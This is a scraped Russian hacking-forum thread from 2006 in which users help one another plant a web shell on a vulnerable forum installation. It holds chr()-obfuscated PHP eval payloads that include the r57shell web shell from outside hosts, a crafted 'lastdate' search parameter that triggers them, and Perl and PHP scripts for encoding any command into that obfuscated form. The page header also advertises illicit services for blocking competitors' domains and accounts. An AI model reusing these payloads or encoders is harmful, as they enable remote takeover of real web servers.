Форум АНТИЧАТ - вместо Shell сайт производителя

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
вместо Shell сайт производителя

Опции темы

Поиск в этой теме

Опции просмотра

вместо Shell сайт производителя

04.10.2006, 01:50

Dimazzz

Участник форума

Регистрация: 23.11.2005

Сообщений: 179

Провел на форуме:
770940

Репутация: 23

Отправить сообщение для Dimazzz с помощью ICQ

вместо Shell сайт производителя

дело вообщем татакое:

нашол форум 2.1.3 , создал топик с таким содержимым

eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(114). chr(115). chr(116). chr(46). chr(118). chr(111). chr(105). chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); //

после чего через поиск нашол свои топ и добавил
&lastdate=z|eval.*?%20//)%23e%00

но странно не получил долгожданный шелл , а почемуто подгрузилась страница производителя , как будто шелла у них нет на сервере. Помогите в чем может быть дело.

04.10.2006, 02:37

^ацтанЬ^

Новичок

Регистрация: 04.08.2006

Сообщений: 23

Провел на форуме:
40384

Репутация: 1

Хы ты че тока узнал? воид закрылся, все файлы тоже закрыты
нада расшифровать код этот и вставить свой шел в .тхт формате и потом будет работать се

Вот тебе код чеб зашифровать

PHP код:


		
			
#!usr/bin/perl

while ()

{

   print "\r\nCommand for encode or 'exit' for exit ";

   while(<STDIN>)

    {

       $cmd=$_;

       chomp($cmd);

       exit() if ($cmd eq 'exit');

       last;

    }

 $len = length($cmd);

 for ($i=0; $i<$len; $i++)

    {

  $s = substr($cmd,$i,1);

  $out.="chr(".ord($s).")";

  if($i != $len-1)

    {

     $out.=".";

     }

   

 }

print "eval(system(".$out.").chr(59).exit()); //";

$out = "";

}

а зашифрованно там это:

PHP код:


		
			
eval("include \"http://rst.void.ru/download/r57shell.txt\";/*");

04.10.2006, 04:03

~~qPhoenix~~

Banned

Регистрация: 15.12.2005

Сообщений: 95

Провел на форуме:
1509352

Репутация: 132

Отправить сообщение для qPhoenix с помощью ICQ

Спрашивается, зачем усложнять себе жизнь?

Вот код на ПХП, куда вставлять адрес - думаю видно...

PHP код:


		
			
<?php

$str="include \"http://rst.void.ru/download/r57shell.txt.gz\";/*";// */

echo "eval( ";

for($i=0;$i<strlen($str);$i++)

{

    echo "chr(".ord($str[$i])."). ";

}

echo "chr(".ord(" ").") ); //";

?

Кстать, файлы на рст не закрыты, а просто у некоторых изменились имена и случилось это еще до закрытия проекта...

rst.void.ru/download/r57shell.txt.gz

хоть и gz - канает без проблем...

04.10.2006, 08:17

^ацтанЬ^

Новичок

Регистрация: 04.08.2006

Сообщений: 23

Провел на форуме:
40384

Репутация: 1

Ну так всеравно надо зашифрововать опять

04.10.2006, 10:43

_-[A.M.D]HiM@S-_

Green member

Регистрация: 28.12.2005

Сообщений: 376

Провел на форуме:
5559831

Репутация: 1833

Вот пользуйся этим :

PHP код:


		
			
eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(104). chr(105). chr(109). chr(97). chr(115). chr(50). chr(48). chr(48). chr(53). chr(46). chr(110). chr(97). chr(114). chr(111). chr(100). chr(46). chr(114). chr(117). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(112). chr(104). chr(112). chr(34). chr(59). chr(47). chr(42). chr(32) ); //

04.10.2006, 23:13

Azazel

Заведующий всем

Регистрация: 17.04.2005

Сообщений: 1,062

Провел на форуме:
5957900

Репутация: 561

Пльзуйся своим. Перевести можно тут http://www.paulschou.com/tools/xlate/

__________________
Full DNS report

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обзор бесплатных Cms	em00s7	PHP, PERL, MySQL, JavaScript	16	03.07.2009 13:13
Сделай сайт своей мечты	SVipeR	Мировые новости	4	12.09.2006 10:15
Сайт МТС	BlackCats	Уязвимости	1	15.05.2006 15:42
Сайт SCO [www.sco.com] деликатно взломали	ФРАЙ	Мировые новости	0	01.12.2004 00:27

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход